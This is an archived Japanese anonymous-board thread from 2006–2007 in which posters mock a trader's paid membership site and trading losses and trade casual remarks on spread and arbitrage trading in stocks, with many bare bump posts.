303 :名無しさん@大変な事がおきました:2006/10/02(月) 12:10:03 ID:0TFUA2Dh
相変らず、言ってることがサッパリわからねえ。
こいつ狂ってるよ。

304 :名無しさん@大変な事がおきました:2006/10/02(月) 12:12:07 ID:11jTaU40
あちこちで名を売ってる人よ、有料サイト立ち上げはまだかえ?
実績出さなきゃ誰もついてこないよ

305 :Loop ◆pCagQ2VMTg :2006/10/02(月) 13:16:49 ID:X6ljP6db
>>304
だからさあ、俺のせいじゃ無いって。

墓の押し売りとか、キャッチセールスの電話で、効果あるのは最初の数本。
100番目の墓の押し売りとか、まったく効果が無い。

自分でそおいうのをやりたいのかどうか知らんが、断じて俺のせいでは無いし、
営業妨害でも無い。

306 :名無しさん@大変な事がおきました:2006/10/02(月) 13:45:33 ID:XFoo2HG1
株でのさや取りなんか相関関係が全く無いから危険きわまりない。


307 :名無しさん@大変な事がおきました:2006/10/02(月) 14:29:37 ID:0TFUA2Dh
俺のせいじゃ無いって  ??
この意味もわからねえ
何か、Loopのせいだとかそんな話題を>>304が持ち出したか?


308 :名無しさん@大変な事がおきました:2006/10/02(月) 17:10:12 ID:11jTaU40
プププ

本性が出てきたかえ?

それとも図星だからムカついてきた?

ワロタワロタ。

309 :名無しさん@大変な事がおきました:2006/10/02(月) 17:58:31 ID:nCMXREKk
age

310 :名無しさん@大変な事がおきました:2006/10/03(火) 20:38:02 ID:1KnOOM2m

なんだ、株はサヤ取りできないのか?

311 :名無しさん@大変な事がおきました:2006/10/04(水) 16:36:42 ID:6PUv65CA
こんな損師のやられっぷりを見るために金を払うとは、
会員の方達は実に奇特な方ですなwww

 さっさと止めて、相場本の1冊でも読んだ方が余程ましですよw



312 :名無しさん@大変な事がおきました:2006/10/05(木) 17:47:33 ID:F0v1Zj9U
地雷君はまたオイルで爆死、涼しい顔して再開してます〜
あんた何回リセットしてんのさ!

しんぺい君も同類?

313 :名無しさん@大変な事がおきました:2006/10/05(木) 19:16:26 ID:lK6jJ6xm
株のさや取りは銘柄間つまりストラドルしか無い
たとえば日産売り トヨタ買いのように
同じ業種内で連動性のある銘柄を見つける。
しかし業績もまったく違うので、片張りをやってるのと同じ。



314 :名無しさん@大変な事がおきました:2006/10/05(木) 19:58:58 ID:NkOz/zTn
http://vista.undo.jp/img/vi6004090526.jpg

これは勉強になるですよ 漫画ですので読みやすいです。
一読してみましょう

>>313
国、株主、先物と個別、オプション4種と先物などのバタフライ等系の鞘取り
指数と先物、同業種、親子、色々あると思うけど?


315 :magariya.org:2006/10/05(木) 20:09:52 ID:CgTMv7Co
株だと大証と東証の裁定取引は有名だけど。

316 :名無しさん@大変な事がおきました:2006/10/05(木) 23:31:34 ID:0Xgmj7wT
kyu-chan (2006/10/05(Thu) 19:37:14) 
  秋山せんせい 今引退したら私以下ですよ。
がんんばttください。」」」

317 :名無しさん@大変な事がおきました:2006/10/06(金) 07:22:47 ID:ZWfztZjv
損師ぃ、どうなったの?気になるなぁ。

318 :名無しさん@大変な事がおきました:2006/10/06(金) 08:21:17 ID:gmAmy6/H
損師 違約発生!

319 :名無しさん@大変な事がおきました:2006/10/07(土) 15:55:13 ID:RcCFkDui
>>314
これはなんのマンガ?

320 :名無しさん@大変な事がおきました:2006/10/14(土) 08:51:59 ID:ezDFQLXc
age

321 :名無しさん@大変な事がおきました:2006/10/24(火) 15:16:07 ID:mm8dPFO0
age

322 :名無しさん@大変な事がおきました:2006/10/29(日) 02:36:52 ID:NECe2oK0
相場技研の皆さんは、どうしても、そこそこよい成績を
出そうとするため、損切が少し甘いのかなあ。

323 :名無しさん@大変な事がおきました:2006/11/12(日) 10:34:10 ID:tzLdGzLu
age

324 :名無しさん@大変な事がおきました:2006/11/12(日) 21:28:37 ID:j3VvQ2AI
下げ相場で儲けるのは難しいから名。ショートと言うぐらいだし。ぼろ儲けもあるのがショートだけど。

325 :名無しさん@大変な事がおきました:2006/11/20(月) 14:53:56 ID:B9vdn9jE
age

326 :名無しさん@大変な事がおきました:2006/12/02(土) 08:43:21 ID:NoiPxLfr
age

327 :名無しさん@大変な事がおきました:2006/12/02(土) 11:41:58 ID:xpxgkz7d
只今11時42分頃です

328 :名無しさん@大変な事がおきました:2006/12/12(火) 11:16:26 ID:MCRKy6AB
age

329 :名無しさん@大変な事がおきました:2006/12/17(日) 10:52:11 ID:6Lpo1/Pp
あけ

330 :名無しさん@大変な事がおきました:2006/12/24(日) 18:53:21 ID:750UrBEb
age

331 :名無しさん@大変な事がおきました:2007/01/11(木) 00:38:24 ID:kUcaDbSP
age

100 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)